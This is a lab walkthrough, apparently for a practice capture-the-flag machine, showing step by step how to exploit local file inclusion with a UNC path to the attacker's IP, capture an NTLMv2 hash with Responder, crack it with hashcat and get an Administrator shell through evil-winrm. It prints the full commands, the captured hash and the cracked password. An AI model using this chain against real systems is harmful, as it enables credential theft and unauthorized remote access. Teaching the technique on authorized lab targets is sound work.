⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Responder combines two powerful techniques: Local File Inclusion (LFI) to force a Windows web application to make an outbound SMB connection, and Responder to intercept that connection and capture an NTLMv2 authentication hash. The hash is then cracked offline with hashcat. This chain — LFI → NTLM capture → offline crack → authenticated access — is a classic lateral movement pattern in Windows environments.

Tools: nmap · responder · hashcat · evil-winrm  ·  Difficulty: Very Easy  ·  OS: Windows
01 — What You Will Learn
SkillWhy it matters
Local File Inclusion via URL parameterLFI is a top web vuln — and on Windows, it can trigger outbound authentication
Responder for NTLM captureThe most widely used tool for credential capture on internal Windows networks
NTLMv2 hash cracking with hashcatOffline cracking against a wordlist — no account lockout risk
WinRM access with evil-winrmRemote PowerShell access once valid credentials are obtained
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.52 (Win64) 5985/tcp open http Microsoft HTTPAPI 2.0 (WinRM) 7680/tcp open pando-pub?

What you're seeing: port 80 (web app), port 5985 (WinRM — Windows Remote Management). WinRM on 5985 means if you get valid credentials, you can get a remote PowerShell shell via evil-winrm. The web app is the initial attack surface.

ℹ  WinRM port 5985 (HTTP) or 5986 (HTTPS) is a reliable lateral movement channel in Windows environments. It's the protocol that PowerShell remoting and evil-winrm use.
03 — Discovering the LFI

Browsing to port 80 shows a web application with a language selection feature. The URL reveals a page parameter loading files dynamically:

http://10.129.x.x/?page=french.html

This pattern — a parameter that includes a file by name — is a textbook LFI candidate. On Linux you'd test for /etc/passwd. On Windows, you can point it to a UNC path on your machine, forcing the server to authenticate to you over SMB.

04 — Capturing the NTLM Hash

Start Responder on your tun0 (VPN) interface first, then trigger the LFI with a UNC path pointing to your IP.

Step 1 — Start Responder
sudo responder -I tun0
Step 2 — Trigger the LFI with a UNC path
http://10.129.x.x/?page=//YOUR_IP/somefile

The Windows web server tries to resolve the UNC path and authenticates to your Responder instance over SMB. Responder captures the NTLMv2 hash.

Responder output — hash captured
[SMB] NTLMv2-SSP Client : 10.129.x.x [SMB] NTLMv2-SSP Username : RESPONDER\Administrator [SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:1122334455667788: B098A46B6027AC4C30B2B69D74C70B46:010100000000000...
ℹ  NTLMv2 hashes cannot be used directly for pass-the-hash (that requires NTLMv1 or the full NT hash). They must be cracked offline to recover the plaintext password.
05 — Cracking the Hash with Hashcat
Save the hash to a file
echo "Administrator::RESPONDER:1122334455667788:B098A46B..." > hash.txt
Crack with hashcat using rockyou.txt
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Cracked output
Administrator::RESPONDER:...:badminton Session..........: hashcat Status...........: Cracked
Hashcat flagMeaning
-m 5600Hash type: NTLMv2 (NetNTLMv2)
-m 1000Hash type: NTLM (used for pass-the-hash)
-a 0Attack mode: dictionary (default)
-a 3Attack mode: brute-force with mask
--showDisplay previously cracked results from the potfile
06 — Gaining Access via WinRM
Connect with evil-winrm
evil-winrm -i 10.129.x.x -u Administrator -p badminton
Find the flag
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
✓ Submit the flag string to complete the machine.
07 — Key Takeaways
The LFI → Responder → hashcat → WinRM chain is one of the most elegant lateral movement paths in Windows environments. Each step is simple in isolation — the power is in chaining them together.
ConceptReal-world relevance
LFI + UNC path on WindowsA unique Windows behaviour — Linux servers won't authenticate to a UNC path the same way
Responder on internal networksOn a real internal assessment, Responder captures hashes passively from LLMNR/NBNS broadcasts — not just from triggered LFI
Offline cracking has no lockoutUnlike online brute-force, offline hash cracking against rockyou.txt has no account lockout risk
WinRM for post-exploitationevil-winrm gives a full PowerShell prompt — equivalent to an SSH shell on Linux